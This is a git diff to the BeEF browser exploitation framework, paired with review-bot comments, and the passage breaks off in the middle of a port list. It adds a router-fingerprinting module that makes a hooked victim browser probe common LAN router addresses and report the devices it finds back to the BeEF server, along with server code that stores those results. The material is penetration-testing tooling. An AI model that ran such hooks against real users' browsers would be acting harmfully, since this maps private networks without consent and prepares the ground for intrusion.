+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program; if not, write to the Free Software
+ Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
+*/
+
+ var devices = [
+ {make:'DLink',model:'dgl4100',graphic:'/html/images/dgl4100.jpg'},
+ {make:'DLink',model:'dgl4300',graphic:'/html/images/dgl4300.jpg'},
+ {make:'DLink',model:'di524',graphic:'/html/images/di524.jpg'},
+ {make:'DLink',model:'di624',graphic:'/html/images/di624.jpg'},
+ {make:'DLink',model:'di624s',graphic:'/html/images/di624s.jpg'},
+ {make:'DLink',model:'di724gu',graphic:'/html/images/di724gu.jpg'},
+ {make:'DLink',model:'dilb604',graphic:'/html/images/dilb604.jpg'},
+ {make:'DLink',model:'dir130',graphic:'/html/images/dir130.jpg'},
+ {make:'DLink',model:'dir330',graphic:'/html/images/dir330.jpg'},
+ {make:'DLink',model:'dir450',graphic:'/html/images/dir450.jpg'},
+ {make:'DLink',model:'dir451',graphic:'/html/images/dir451.jpg'},
+ {make:'DLink',model:'dir615',graphic:'/html/images/dir615.jpg'},
+ {make:'DLink',model:'dir625',graphic:'/html/images/dir625.jpg'},
+ {make:'DLink',model:'dir635',graphic:'/html/images/dir635.jpg'},
+ {make:'DLink',model:'dir655',graphic:'/html/images/dir655.jpg'},
+ {make:'DLink',model:'dir660',graphic:'/html/images/dir660.jpg'},
+ {make:'DLink',model:'ebr2310',graphic:'/html/images/ebr2310.jpg'},
+ {make:'DLink',model:'kr1',graphic:'/html/images/kr1.jpg'},
+ {make:'DLink',model:'tmg5240',graphic:'/html/images/tmg5240.jpg'},
+ {make:'DLink',model:'wbr1310',graphic:'/html/images/wbr1310.jpg'},
+ {make:'DLink',model:'wbr2310',graphic:'/html/images/wbr2310.jpg'},
+ {make:'DLink',model:'dsl604',graphic:'/html/images/dsl604.jpg'},
+ {make:'DLink',model:'dsl2320b',graphic:'/html/images/dsl2320b.jpg'},
+ {make:'DLink',model:'dsl2540b',graphic:'/html/images/dsl2540b.jpg'},
+ {make:'DLink',model:'dsl2640b',graphic:'/html/images/dsl2640b.jpg'},
+ {make:'DLink',model:'dsl302g',graphic:'/html/images/dsl302g.jpg'},
+ {make:'DLink',model:'dsl502g',graphic:'/html/images/dsl502g.jpg'},
+ {make:'DLink',model:'dgl3420',graphic:'/html/images/dgl3420.jpg'},
+ {make:'DLink',model:'dwl2100ap',graphic:'/html/images/dwl2100ap.jpg'},
+ {make:'DLink',model:'dwl2130ap',graphic:'/html/images/dwl2130ap.jpg'},
+ {make:'DLink',model:'dwl2200ap',graphic:'/html/images/dwl2200ap.jpg'},
+ {make:'DLink',model:'dwl2230ap',graphic:'/html/images/dwl2230ap.jpg'},
+ {make:'DLink',model:'dwl2700ap',graphic:'/html/images/dwl2700ap.jpg'},
+ {make:'DLink',model:'dwl3200ap',graphic:'/html/images/dwl3200ap.jpg'},
+ {make:'DLink',model:'dwl7100ap',graphic:'/html/images/dwl7100ap.jpg'},
+ {make:'DLink',model:'dwl7130ap',graphic:'/html/images/dwl7130ap.jpg'},
+ {make:'DLink',model:'dwl7200ap',graphic:'/html/images/dwl7200ap.jpg'},
+ {make:'DLink',model:'dwl7230ap',graphic:'/html/images/dwl7230ap.jpg'},
+ {make:'DLink',model:'dwl7700ap',graphic:'/html/images/dwl7700ap.jpg'},
+ {make:'DLink',model:'dwl8200ap',graphic:'/html/images/dwl8200ap.jpg'},
+ {make:'DLink',model:'dwl8220ap',graphic:'/html/images/dwl8220ap.jpg'},
+ {make:'DLink',model:'dwlag132',graphic:'/html/images/dwlag132.jpg'},
+ {make:'DLink',model:'dwlag530',graphic:'/html/images/dwlag530.jpg'},
+ {make:'DLink',model:'dwlag660',graphic:'/html/images/dwlag660.jpg'},
+ {make:'DLink',model:'dwlag700ap',graphic:'/html/images/dwlag700ap.jpg'},
+ {make:'DLink',model:'dwlg120',graphic:'/html/images/dwlg120.jpg'},
+ {make:'DLink',model:'dwlg122',graphic:'/html/images/dwlg122.jpg'},
+ {make:'DLink',model:'dwlg132',graphic:'/html/images/dwlg132.jpg'},
+ {make:'DLink',model:'dwlg510',graphic:'/html/images/dwlg510.jpg'},
+ {make:'DLink',model:'dwlg520',graphic:'/html/images/dwlg520.jpg'},
+ {make:'DLink',model:'dwlg520m',graphic:'/html/images/dwlg520m.jpg'},
+ {make:'DLink',model:'dwlg550',graphic:'/html/images/dwlg550.jpg'},
+ {make:'DLink',model:'dwlg630',graphic:'/html/images/dwlg630.jpg'},
+ {make:'DLink',model:'dwlg650',graphic:'/html/images/dwlg650.jpg'},
+ {make:'DLink',model:'dwlg650m',graphic:'/html/images/dwlg650m.jpg'},
+ {make:'DLink',model:'dwlg680',graphic:'/html/images/dwlg680.jpg'},
+ {make:'DLink',model:'dwlg700ap',graphic:'/html/images/dwlg700ap.jpg'},
+ {make:'DLink',model:'dwlg710',graphic:'/html/images/dwlg710.jpg'},
+ {make:'DLink',model:'dwlg730ap',graphic:'/html/images/dwlg730ap.jpg'},
+ {make:'DLink',model:'dwlg820',graphic:'/html/images/dwlg820.jpg'},
+ {make:'DLink',model:'wda1320',graphic:'/html/images/wda1320.jpg'},
+ {make:'DLink',model:'wda2320',graphic:'/html/images/wda2320.jpg'},
+ {make:'DLink',model:'wna1330',graphic:'/html/images/wna1330.jpg'},
+ {make:'DLink',model:'wna2330',graphic:'/html/images/wna2330.jpg'},
+ {make:'DLink',model:'wua1340',graphic:'/html/images/wua1340.jpg'},
+ {make:'DLink',model:'wua2340',graphic:'/html/images/wua2340.jpg'},
+ {make:'DLink',model:'DSL502T',graphic:'/html/images/help_p.jpg'},
+ {make:'DLink',model:'DSL524T',graphic:'/html/images/device.gif'},
+ {make:'Netgear',model:'CG814WG',graphic:'/images/../settingsCG814WG.gif'},
+ {make:'Netgear',model:'CM212',graphic:'/images/../settingsCM212.gif'},
+ {make:'Netgear',model:'DG632',graphic:'/images/../settingsDG632.gif'},
+ {make:'Netgear',model:'DG632B',graphic:'/images/../settingsDG632B.gif'},
+ {make:'Netgear',model:'DG814',graphic:'/images/../settingsDG814.gif'},
+ {make:'Netgear',model:'DG824M',graphic:'/images/../settingsDG824M.gif'},
+ {make:'Netgear',model:'DG834',graphic:'/images/../settingsDG834.gif'},
+ {make:'Netgear',model:'DG834B',graphic:'/images/../settingsDG834B.gif'},
+ {make:'Netgear',model:'DG834G',graphic:'/images/../settingsDG834G.gif'},
+ {make:'Netgear',model:'DG834GB',graphic:'/images/../settingsDG834GB.gif'},
+ {make:'Netgear',model:'DG834GT',graphic:'/images/../settingsDG834GT.gif'},
+ {make:'Netgear',model:'DG834GTB',graphic:'/images/../settingsDG834GTB.gif'},
+ {make:'Netgear',model:'DG834GV',graphic:'/images/../settingsDG834GV.gif'},
+ {make:'Netgear',model:'dg834N',graphic:'/images/../settingsdg834N.gif'},
+ {make:'Netgear',model:'DG834PN',graphic:'/images/../settingsDG834PN.gif'},
+ {make:'Netgear',model:'DGFV338',graphic:'/images/../settingsDGFV338.gif'},
+ {make:'Netgear',model:'DM111P',graphic:'/images/../settingsDM111P.gif'},
+ {make:'Netgear',model:'DM602',graphic:'/images/../settingsDM602.gif'},
+ {make:'Netgear',model:'FM114P',graphic:'/images/../settingsFM114P.gif'},
+ {make:'Netgear',model:'FR114P',graphic:'/images/../settingsFR114P.gif'},
+ {make:'Netgear',model:'FR114W',graphic:'/images/../settingsFR114W.gif'},
+ {make:'Netgear',model:'FR314',graphic:'/images/../settingsFR314.gif'},
+ {make:'Netgear',model:'FR318',graphic:'/images/../settingsFR318.gif'},
+ {make:'Netgear',model:'FR328S',graphic:'/images/../settingsFR328S.gif'},
+ {make:'Netgear',model:'FV318',graphic:'/images/../settingsFV318.gif'},
+ {make:'Netgear',model:'FVG318',graphic:'/images/../settingsFVG318.gif'},
+ {make:'Netgear',model:'FVL328',graphic:'/images/../settingsFVL328.gif'},
+ {make:'Netgear',model:'FVM318',graphic:'/images/../settingsFVM318.gif'},
+ {make:'Netgear',model:'FVS114',graphic:'/images/../settingsFVS114.gif'},
+ {make:'Netgear',model:'FVS124G',graphic:'/images/../settingsFVS124G.gif'},
+ {make:'Netgear',model:'FVS318',graphic:'/images/../settingsFVS318.gif'},
+ {make:'Netgear',model:'FVS328',graphic:'/images/../settingsFVS328.gif'},
+ {make:'Netgear',model:'FVS338',graphic:'/images/../settingsFVS338.gif'},
+ {make:'Netgear',model:'FVX538',graphic:'/images/../settingsFVX538.gif'},
+ {make:'Netgear',model:'FWAG114',graphic:'/images/../settingsFWAG114.gif'},
+ {make:'Netgear',model:'FWG114P',graphic:'/images/../settingsFWG114P.gif'},
+ {make:'Netgear',model:'GA302T',graphic:'/images/../settingsGA302T.gif'},
+ {make:'Netgear',model:'GA311',graphic:'/images/../settingsGA311.gif'},
+ {make:'Netgear',model:'GA511',graphic:'/images/../settingsGA511.gif'},
+ {make:'Netgear',model:'GA620',graphic:'/images/../settingsGA620.gif'},
+ {make:'Netgear',model:'GA621',graphic:'/images/../settingsGA621.gif'},
+ {make:'Netgear',model:'GA622T',graphic:'/images/../settingsGA622T.gif'},
+ {make:'Netgear',model:'HE102',graphic:'/images/../settingsHE102.gif'},
+ {make:'Netgear',model:'HR314',graphic:'/images/../settingsHR314.gif'},
+ {make:'Netgear',model:'JFS516',graphic:'/images/../settingsJFS516.gif'},
+ {make:'Netgear',model:'JFS524',graphic:'/images/../settingsJFS524.gif'},
+ {make:'Netgear',model:'JFS524F',graphic:'/images/../settingsJFS524F.gif'},
+ {make:'Netgear',model:'JGS516',graphic:'/images/../settingsJGS516.gif'},
+ {make:'Netgear',model:'JGS524',graphic:'/images/../settingsJGS524.gif'},
+ {make:'Netgear',model:'JGS524F',graphic:'/images/../settingsJGS524F.gif'},
+ {make:'Netgear',model:'KWGR614',graphic:'/images/../settingsKWGR614.gif'},
+ {make:'Netgear',model:'ME101',graphic:'/images/../settingsME101.gif'},
+ {make:'Netgear',model:'ME102',graphic:'/images/../settingsME102.gif'},
+ {make:'Netgear',model:'ME103',graphic:'/images/../settingsME103.gif'},
+ {make:'Netgear',model:'MR314',graphic:'/images/../settingsMR314.gif'},
+ {make:'Netgear',model:'MR814',graphic:'/images/../settingsMR814.gif'},
+ {make:'Netgear',model:'RH340',graphic:'/images/../settingsRH340.gif'},
+ {make:'Netgear',model:'RH348',graphic:'/images/../settingsRH348.gif'},
+ {make:'Netgear',model:'RM356',graphic:'/images/../settingsRM356.gif'},
+ {make:'Netgear',model:'RO318',graphic:'/images/../settingsRO318.gif'},
+ {make:'Netgear',model:'RP114',graphic:'/images/../settingsRP114.gif'},
+ {make:'Netgear',model:'RP334',graphic:'/images/../settingsRP334.gif'},
+ {make:'Netgear',model:'RP614',graphic:'/images/../settingsRP614.gif'},
+ {make:'Netgear',model:'RT311',graphic:'/images/../settingsRT311.gif'},
+ {make:'Netgear',model:'RT314',graphic:'/images/../settingsRT314.gif'},
+ {make:'Netgear',model:'RT328',graphic:'/images/../settingsRT328.gif'},
+ {make:'Netgear',model:'RT338',graphic:'/images/../settingsRT338.gif'},
+ {make:'Netgear',model:'WAB102',graphic:'/images/../settingsWAB102.gif'},
+ {make:'Netgear',model:'WAG102',graphic:'/images/../settingsWAG102.gif'},
+ {make:'Netgear',model:'WAG302',graphic:'/images/../settingsWAG302.gif'},
+ {make:'Netgear',model:'WAGL102',graphic:'/images/../settingsWAGL102.gif'},
+ {make:'Netgear',model:'WAGR614',graphic:'/images/../settingsWAGR614.gif'},
+ {make:'Netgear',model:'WG102',graphic:'/images/../settingsWG102.gif'},
+ {make:'Netgear',model:'WG111',graphic:'/images/../settingsWG111.gif'},
+ {make:'Netgear',model:'WG111T',graphic:'/images/../settingsWG111T.gif'},
+ {make:'Netgear',model:'WG302',graphic:'/images/../settingsWG302.gif'},
+ {make:'Netgear',model:'WG311',graphic:'/images/../settingsWG311.gif'},
+ {make:'Netgear',model:'WG602',graphic:'/images/../settingsWG602.gif'},
+ {make:'Netgear',model:'WGE101',graphic:'/images/../settingsWGE101.gif'},
+ {make:'Netgear',model:'WGE111',graphic:'/images/../settingsWGE111.gif'},
+ {make:'Netgear',model:'WGL102',graphic:'/images/../settingsWGL102.gif'},
+ {make:'Netgear',model:'WGM124',graphic:'/images/../settingsWGM124.gif'},
+ {make:'Netgear',model:'WGR101',graphic:'/images/../settingsWGR101.gif'},
+ {make:'Netgear',model:'WGR614',graphic:'/images/../settingsWGR614.gif'},
+ {make:'Netgear',model:'WGT624',graphic:'/images/../settingsWGT624.gif'},
+ {make:'Netgear',model:'WGT624SC',graphic:'/images/../settingsWGT624SC.gif'},
+ {make:'Netgear',model:'WGT634U',graphic:'/images/../settingsWGT634U.gif'},
+ {make:'Netgear',model:'WGU624',graphic:'/images/../settingsWGU624.gif'},
+ {make:'Netgear',model:'WGX102',graphic:'/images/../settingsWGX102.gif'},
+ {make:'Netgear',model:'WN121T',graphic:'/images/../settingsWN121T.gif'},
+ {make:'Netgear',model:'WN311B',graphic:'/images/../settingsWN311B.gif'},
+ {make:'Netgear',model:'WN311T',graphic:'/images/../settingsWN311T.gif'},
+ {make:'Netgear',model:'WN511B',graphic:'/images/../settingsWN511B.gif'},
+ {make:'Netgear',model:'WN511T',graphic:'/images/../settingsWN511T.gif'},
+ {make:'Netgear',model:'WN802T',graphic:'/images/../settingsWN802T.gif'},
+ {make:'Netgear',model:'WNR834B',graphic:'/images/../settingsWNR834B.gif'},
+ {make:'Netgear',model:'WNR834M',graphic:'/images/../settingsWNR834M.gif'},
+ {make:'Netgear',model:'WNR854T',graphic:'/images/../settingsWNR854T.gif'},
+ {make:'Netgear',model:'WPN802',graphic:'/images/../settingsWPN802.gif'},
+ {make:'Netgear',model:'WPN824',graphic:'/images/../settingsWPN824.gif'},
+ {make:'Netgear',model:'XM128',graphic:'/images/../settingsXM128.gif'},
+ {make:'Thomson',model:'Cable Modem A801',graphic:'/images/thomson.gif'},
+ {make:'Vigor',model:'2600V',graphic:'/images/logo1.jpg'},
+ {make:'Linksys',model:'WRT54GL',graphic:'/WRT56GL.gif'},
+ {make:'Linksys',model:'WRT54GC',graphic:'/UI_Linksys.gif'},
+ {make:'Linksys',model:'WRT54G',graphic:'/WRT54G.gif'},
+ {make:'Linksys',model:'WRT54GS',graphic:'/UILinksys.gif'},
+ {make:'ZyXEL',model:'Prestige 660H61',graphic:'/dslroutery/imgshop/full/NETZ1431.jpg'},
+ {make:'ZyXEL',model:'Zywall',graphic:'/images/Logo.gif'},
+ {make:'Sitecom',model:'WL114',graphic:'/slogo.gif'},
+ {make:'2Wire',model:'1000 Series',graphic:'/base/web/def/def/images/nav_sl_logo.gif'},
+ {make:'SurfinBird',model:'313',graphic:'/images/help_p.gif'},
+ {make:'SMC',model:'7004ABR',graphic:'/images/logo.gif'},
+ {make:'DLink',model:'DI524',graphic:'/m524.gif'},
+ {make:'Cisco',model:'2600',graphic:'/images/logo.png'},
+ {make:'ASUS',model:'RT Series',graphic:'/images/EZSetup_button.gif'}
+ ];
+
+ // No signatures for commented out IPs
+ var ips = [
+ {ip:'192.168.1.30',make:'DLink'},
+ {ip:'192.168.1.50',make:'DLink'},
+ {ip:'192.168.2.1',make:'SMC'},
+ //{ip:'192.168.2.1',make:'Accton'},
+ //{ip:'192.168.1.1',make:'3Com'},
+ //{ip:'192.168.1.1',make:'AirLink'},
+ //{ip:'192.168.1.1',make:'Arescom'},
+ //{ip:'192.168.1.1',make:'Teletronics'},
+ //{ip:'192.168.1.1',make:'Dell'},
+ {ip:'192.168.1.1',make:'DLink'},
+ {ip:'192.168.1.1',make:'Linksys'},
+ {ip:'192.168.1.1',make:'ZyXEL'},
+ {ip:'192.168.1.1',make:'ASUS'},
+ {ip:'192.168.0.1',make:'DLink'},
+ {ip:'192.168.0.1',make:'Netgear'},
+ {ip:'192.168.0.1',make:'Linksys'},
+ {ip:'192.168.0.1',make:'SurfinBird'},
+ {ip:'192.168.0.1',make:'ASUS'},
+ {ip:'192.168.0.227',make:'Netgear'},
+ {ip:'192.168.0.254',make:'DLink'},
+ {ip:'192.168.1.225',make:'Linksys'},
+ {ip:'192.168.1.226',make:'Linksys'},
+ {ip:'192.168.1.245',make:'Linksys'},
+ {ip:'192.168.1.246',make:'Linksys'},
+ {ip:'192.168.1.251',make:'Linksys'},
+ {ip:'192.168.100.1',make:'Thomson'},
+ {ip:'192.168.1.254',make:'ZyXEL'},
+ {ip:'192.168.1.254',make:'2Wire'},
+ {ip:'192.168.0.1',make:'Vigor'},
+ {ip:'192.168.123.254',make:'Sitecom'},
+ //{ip:'10.0.1.1',make:'Apple'},
+ {ip:'10.1.1.1',make:'DLink'},
+ {ip:'10.0.0.1',make:'ZyXEL'},
+ //{ip:'10.0.0.2',make:'Aceex'},
+ //{ip:'10.0.0.2',make:'Bausch'},
+ //{ip:'10.0.0.2',make:'E-Tech'},
+ //{ip:'10.0.0.2',make:'JAHT'},
+ {ip:'192.168.1.254',make:'2Wire'},
+ {ip:'192.168.65.1',make:'Cisco'}
+ //{ip:'192.168.100.1',make:'Motorola'},
+ //{ip:'192.168.100.1',make:'Ambit'},
+ ];
+
+ var guesses = [
+ {host:'10.1.1.1',label:'Device',labelText:'DLink',port:80},
+ {host:'10.0.0.1',label:'Device',labelText:'ZyXEL',port:80},
+ {host:'10.0.0.2',label:'Device',labelText:'Aceex,Bausch,E-Tech,JAHT',port:80},
+ {host:'10.0.0.138',label:'Device',labelText:'Alcatel',port:80},
+ {host:'10.0.1.1',label:'Device',labelText:'Apple',port:80},
+ {host:'192.168.0.1',label:'Device',labelText:'DLink,Netgear,ASUS,Linksys,Sitecom,Belkin',port:80},
+ {host:'192.168.0.227',label:'Device',labelText:'Netgear',port:80},
+ {host:'192.168.0.254',label:'Device',labelText:'DLink,Sitecom/Linux IP Cop',port:80},
+ {host:'192.168.1.1',label:'Device',labelText:'3Com,AirLink,Linksys,Arescom,ASUS,Dell,DLink,ZyXEL,Teletronics',port:80},
+ {host:'192.168.1.30',label:'Device',labelText:'DLink',port:80},
+ {host:'192.168.1.50',label:'Device',labelText:'DLink,Linksys',port:80},
+ {host:'192.168.1.225',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.226',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.245',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.246',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.251',label:'Device',labelText:'Linksys',port:80},
+ {host:'192.168.1.254',label:'Device',labelText:'ZyXEL',port:80},
+ {host:'192.168.2.1',label:'Device',labelText:'Accton,Belkin,Microsoft,SMC',port:80},
+ {host:'192.168.2.25',label:'Device',labelText:'SMC',port:80},
+ {host:'192.168.8.1',label:'Device',labelText:'Aceex',port:80},
+ {host:'192.168.11.1',label:'Device',labelText:'Buffalo',port:80},
+ {host:'192.168.62.1',label:'Device',labelText:'Canyon',port:80},
+ {host:'192.168.100.1',label:'Device',labelText:'Ambit,Thomson,Motorola',port:80},
+ {host:'192.168.123.254',label:'Device',labelText:'US Robotics',port:80},
+ {host:'192.168.123.254',label:'Device',labelText:'Sitecom',port:80},
+ {host:'192.168.254.254',label:'Device',labelText:'Flowpoint',port:80},
+ {host:'192.168.254.1',label:'Device',labelText:'BT M5861,2Wire',port:80}
+ ];
+
+ lanScanner = {timeout:1,probes:0};
+ //lol pardon the innuendo
+ lanScanner.handleProbe = function(portObj) {
+ if(portObj.init == 1) {
+ lanScanner.addDevice({host:portObj.host,make:portObj.make,model:portObj.model});
+ document.body.removeChild(portObj);
+ }
+ }
+ // ie sucks! onload doesn't work unless specified directly in the document
+ // that's why I have to do this :(
+ lanScanner.handleConnection = function(portObj) {
+ if(portObj.init == 1) {
+ if(beef.browser.isIE()) {
+ portObj.end = new Date().getTime();
+ if(portObj.end - portObj.start > 15000) {
+ document.body.removeChild(portObj);
+ return false;
+ }
+ }
+ var obj = portObj.store;
+ obj.status = 'Open';
+ lanScanner.addHost(obj);
+ document.body.removeChild(portObj);
+ } else {
+ portObj.start = new Date().getTime();
+ }
+ }
+ lanScanner.runScan = function() {
+ var obj, portObj;
+ guessesLen = guesses.length;
+ for(var i=0;i", <%= @command_id %>, 'proto=http&ip='+obj.host+'&port='+obj.port+'&service='+this.getPortName(obj.port));
+ lanScanner.fingerPrint(obj.host);
+ }
+ lanScanner.addDevice = function(obj) {
+ beef.debug("[JS LAN Scanner] Found " + obj.make + ' ' + obj.model + ' [ip: ' + obj.host + ']');
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, 'ip='+obj.host+'&device='+obj.make+' '+obj.model);
+ }
+ lanScanner.destroyConnections = function() {
+ var guessesLen = guesses.length;
+ for(var f=0;f", <%= @command_id %>, "Starting scan ("+guessesLen+" IPs)");
+ lanScanner.runScan();
+ //lanScanner.destroyConnections();
+});
+
diff --git a/modules/network/jslanscanner/config.yaml b/modules/network/jslanscanner/config.yaml
new file mode 100644
index 000000000..8557f190f
--- /dev/null
+++ b/modules/network/jslanscanner/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Ported to BeEF from JsLanScanner: https://code.google.com/p/jslanscanner/source/browse/trunk/lan_scan/js/lan_scan.js
+#
+beef:
+ module:
+ fingerprint_routers:
+ enable: true
+ category: "Network"
+ name: "Fingerprint Routers"
+ description: "This module attempts to discover network routers on the local network of the hooked browser. It scans for web servers on IP addresses commonly used by routers. It uses a signature based approach - based on default image paths for known network devices - to determine if the web server is a router web interface.
Ported to BeEF from JsLanScanner.
Note: The user may see authentication popups in the event any of the target IP addresses are using HTTP authentication."
+ authors: ["Gareth Heyes"]
+ target:
+ user_notify: ["FF", "S"]
+ not_working: ["C", "IE"]
diff --git a/modules/network/jslanscanner/module.rb b/modules/network/jslanscanner/module.rb
new file mode 100644
index 000000000..0352c31ae
--- /dev/null
+++ b/modules/network/jslanscanner/module.rb
@@ -0,0 +1,47 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Fingerprint_routers < BeEF::Core::Command
+
+ def self.options
+ return [
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['results'] = @datastore['results'] if not @datastore['results'].nil?
+ save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&service=(.+)/
+ proto = $1
+ ip = $2
+ port = $3
+ service = $4
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found network service " + service + " [proto: #{proto}, ip: #{ip}, port: #{port}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => service, :cid => cid)
+ r.save
+ end
+ elsif @datastore['results'] =~ /^ip=(.+)&device=(.+)/
+ ip = $1
+ device = $2
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found network device " + device + " [ip: #{ip}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => device, :cid => cid)
+ r.save
+ end
+ end
+ end
+
+ end
+end
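Review bot: Both patterns in `post_execute` capture `ip` with `(.+)` and anchor with `^`, which in Ruby matches at every line start, so whatever the hooked browser sends in `results` is written to `NetworkService`/`NetworkHost` without being checked as an address. The browser is untrusted input to the server here; I would anchor with `\A` and restrict the field the way the ping_sweep and port_scanner modules in this commit do, e.g. `/\Aproto=([^&]+)&ip=([\d\.]+)&port=(\d+)&service=([^&]+)/` and `/\Aip=([\d\.]+)&device=(.+)/`. The `if !ip.nil?` guards cannot be false once the match has succeeded and can be dropped. The return value of `r.save` is ignored, so a failed insert is silent; the same unchecked `r.save` appears in the ping_sweep and port_scanner module.rb hunks.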
diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb
index 0eea04f61..4081ff2f8 100644
--- a/modules/network/ping_sweep/module.rb
+++ b/modules/network/ping_sweep/module.rb
@@ -26,5 +26,21 @@ class Ping_sweep < BeEF::Core::Command
content['fail'] = 'No active hosts have been discovered.'
end
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+
+ # save the network host
+ if @datastore['results'] =~ /host=([\d\.]+) is alive/
+ ip = $1
+ print_debug("Hooked browser has network interface #{ip}")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
+ r.save
+ end
+ end
+
end
end
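Review bot: The debug message `Hooked browser has network interface #{ip}` describes the wrong thing: this branch records a host that answered the sweep (`host=… is alive`), not an interface of the browser, and it reads as if copied from another module. Something like `print_debug("Hooked browser found host #{ip}")` would match the `# save the network host` comment above it. The pattern is unanchored and `[\d\.]+` also accepts strings such as `1..2`, so checking the capture with `IPAddr` before `NetworkHost.new` would keep malformed values out of the table. The method's body starts outside the hunk.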
diff --git a/modules/network/port_scanner/command.js b/modules/network/port_scanner/command.js
index b10897376..07f5c7c8c 100644
--- a/modules/network/port_scanner/command.js
+++ b/modules/network/port_scanner/command.js
@@ -9,9 +9,9 @@ beef.execute(function() {
var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ];
- var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];
+ var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];
- var default_services = { '1':'tcpmux','5':'rje','7':'echo','9':'msn','15':'netstat','20':'ftp-data','21':'ftp','22':'ssh','23':'telnet','25':'smtp','26':'rsftp','29':'msgicp','33':'dsp','37':'time','42':'nameserver','43':'whois','53':'dns','67':'dhcps','68':'dhcpc','69':'tftp','70':'gopher','76':'deos','79':'finger','80':'http','88':'kerberos-sec','90':'dnsix','98':'linuxconf','101':'hostname','106':'pop3pw','109':'pop2','110':'pop3','111':'rpcbind','113':'auth','114':'audionews','115':'sftp','118':'sqlserv','119':'nntp','123':'ntp','129':'pwdgen','132':'cisco-sys','133':'statsrv','135':'msrpc','136':'profile','137':'netbios-ns','138':'netbios-dgm','139':'netbios-ssn','143':'imap','144':'news','156':'sqlserv','158':'pcmail-srv','161':'snmp','162':'snmptrap','168':'rsvd','174':'mailq','177':'xdmcp','194':'irc','197':'dls','209':'tam','213':'ipx','217':'dbase','219':'uarps','220':'imap3','223':'cdc','264':'bgmp','315':'dpsi','316':'decauth','346':'zserv','353':'ndsauth','389':'ldap','413':'smsp','414':'infoseek','415':'bnet','416':'silverplatter','440':'sgcp','443':'https','444':'snpp','445':'microsoft-ds','453':'creativeserver','454':'contentserver','456':'macon','457':'scohelp','458':'appleqtc','462':'datasurfsrvsec','464':'kpasswd5','465':'smtps','466':'digital-vrc','480':'loadsrv','486':'sstats','497':'retrospect','500':'isakmp','501':'stmf','516':'videotex','518':'ntalk','522':'ulp','523':'ibm-db2','524':'ncp','525':'timed','526':'tempo','533':'netwall','535':'iiop','538':'gdomap','540':'uucp','541':'uucp-rlogin','542':'commerce','543':'klogin','544':'kshell','545':'ekshell','546':'dhcpconf','547':'dhcpserv','556':'remotefs','557':'openvms-sysipc','560':'rmonitor','561':'monitor','563':'snews','564':'9pfs','625':'apple-xsrvr-admin','626':'apple-imap-admin','636':'ldapssl','637':'lanserver','660':'mac-srvr-admin','664':'secure-aux-bus','666':'doom','683':'corba-iiop','740':'netcp','741':'netgw','742':'netrcs','744':'flexlm','747':'fujitsu-dev','748':'ris-cm','74
